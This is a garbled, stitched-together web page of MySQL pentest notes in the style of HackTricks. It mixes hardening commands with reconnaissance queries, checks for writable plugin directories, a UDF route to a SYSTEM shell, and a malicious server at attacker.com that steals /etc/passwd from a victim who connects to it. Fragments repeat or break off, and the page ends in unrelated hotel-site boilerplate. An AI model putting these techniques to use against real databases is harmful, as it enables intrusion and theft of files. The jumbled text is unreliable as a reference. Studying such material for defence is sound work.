Mysql Hacktricks File

-- Remove dangerous UDFs DROP FUNCTION IF EXISTS sys_exec; DROP FUNCTION IF EXISTS sys_eval;

-- Version & OS SELECT version(); SELECT @@version_comment; SELECT @@hostname; -- Current user & privileges SELECT user(); SELECT current_user(); SELECT grantee, privilege_type FROM information_schema.user_privileges; mysql hacktricks

-- Check for dangerous functions SELECT * FROM mysql.func; -- user-defined functions (UDF) 👑 UDF (User Defined Functions) – SYSTEM shell If secure_file_priv allows writes to plugin dir: -- Remove dangerous UDFs DROP FUNCTION IF EXISTS

-- Disable local_infile SET GLOBAL local_infile = 0; DROP FUNCTION IF EXISTS sys_eval

-- Find writable directories SHOW VARIABLES LIKE 'secure_file_priv'; -- NULL = no file ops, "" = any dir SHOW VARIABLES LIKE 'datadir'; SHOW VARIABLES LIKE 'plugin_dir';

# Malicious server that reads client files python mysql_file_read_server.py Victim connects: mysql -h attacker.com -u root -p → You steal /etc/passwd Try: mysql --enable-local-infile -h target -u user -p 7. Post-Exploitation: OS Shell via MySQL If you can run OS commands (UDF or SQLi with file write):

Promote your business. It's free!Expand Your Reach

Read more in our Visitors Guide
Bellhop Icon: Book A Room